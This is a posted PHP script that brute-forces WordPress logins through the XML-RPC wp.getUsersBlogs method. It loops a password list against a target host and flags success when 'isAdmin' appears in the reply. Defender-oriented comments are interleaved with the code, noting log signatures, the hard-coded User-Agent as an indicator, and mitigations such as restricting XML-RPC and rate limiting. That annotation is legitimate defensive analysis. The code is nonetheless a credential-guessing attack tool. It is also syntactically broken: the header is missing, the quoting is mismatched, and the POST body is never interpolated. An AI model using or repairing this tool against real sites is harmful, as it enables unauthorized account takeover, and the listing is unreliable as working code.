WordPress XML-RPC Bruteforcer to avoid detection
Code:
Usage: php xml_rpc.php target + xml_rpc_path user password_list';
// Annotated for defenders: a command-line credential-guessing loop aimed at a
// WordPress XML-RPC endpoint. It sends one HTTP POST per candidate password and
// inspects the response body for markers of success or failure.
// NOTE(review): the listing as posted is incomplete and is not valid PHP (the
// opening tag and the $banner assignment are missing above this point); it is
// annotated as-is, with no code changes.
// Expects four arguments: target host, XML-RPC path, username, password-list file.
if(isset($argv[1], $argv[2], $argv[3],$argv[4])) {
echo $banner;
$target = $argv[1];
$xml_rpc_path=$argv[2];
$username = $argv[3];
$password_list = $argv[4];// path to the candidate-password file; one entry is used per loop iteration
// XML-RPC method the request is meant to invoke. It takes a username and a
// password, so every call is effectively an authentication attempt.
$set_ramsees_sphinx="wp.getUsersBlogs";
// Read the whole password list into memory, one array element per line.
$lines = file($password_list);
foreach ($lines as $line)
{
echo "\nAttacking: " . $target . attempting to brute force through xml rpc interface "\n";
// A new curl handle is created for every candidate, so each guess is a
// separate request.
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
// Log signature: plain-HTTP POSTs to the XML-RPC path, one per guess. Controls
// that only watch the interactive login form will not see this traffic, which
// is presumably what the page title means by avoiding detection.
curl_setopt($ch, CURLOPT_URL, "http://$target/$xml_rpc_path");
// Hard-coded legacy MSIE 5.01 / Windows NT 5.0 User-Agent: a static value that
// can serve as a detection or blocking indicator for this script.
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
// Request body: an XML-RPC methodCall with two params (username, password).
// Mitigations: disable or restrict XML-RPC where it is not needed, apply rate
// limiting and lockout to this endpoint as well as the login form, and enforce
// strong passwords.
curl_setopt($ch, CURLOPT_POSTFIELDS,'<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>$set_ramsees_sphinx</methodName><params><param><value>$username</value></param><param><value>$line</value></param></params></methodCall>)';
// Short 3-second timeout and low-speed limits: slow responses are abandoned.
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
// Forensic artifact on the host running the script: a cookie file under /tmp
// named after the target argument.
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
// Success heuristic: the response body contains the substring isAdmin
// (presumably a field of a successful wp.getUsersBlogs reply; confirm).
if(preg_match("/isAdmin/", $buf, $matches)){
echo " admin account bruted:\nhttp://" . $target . "/xml_rpc.php\n";
echo $username . ":" . $line;
} else {
// Failure marker: an XML-RPC fault in the response. Server-side, a burst of
// fault responses to a single client is the counterpart of this branch and is
// worth alerting on.
if(preg_match("/faultCode/", $buf, $matches))
echo "Error! An error occured. Account may not of been bruted.";
}
} else {
// Presumably the usage fallback when arguments are missing: print the banner.
echo $banner;
}
}
?>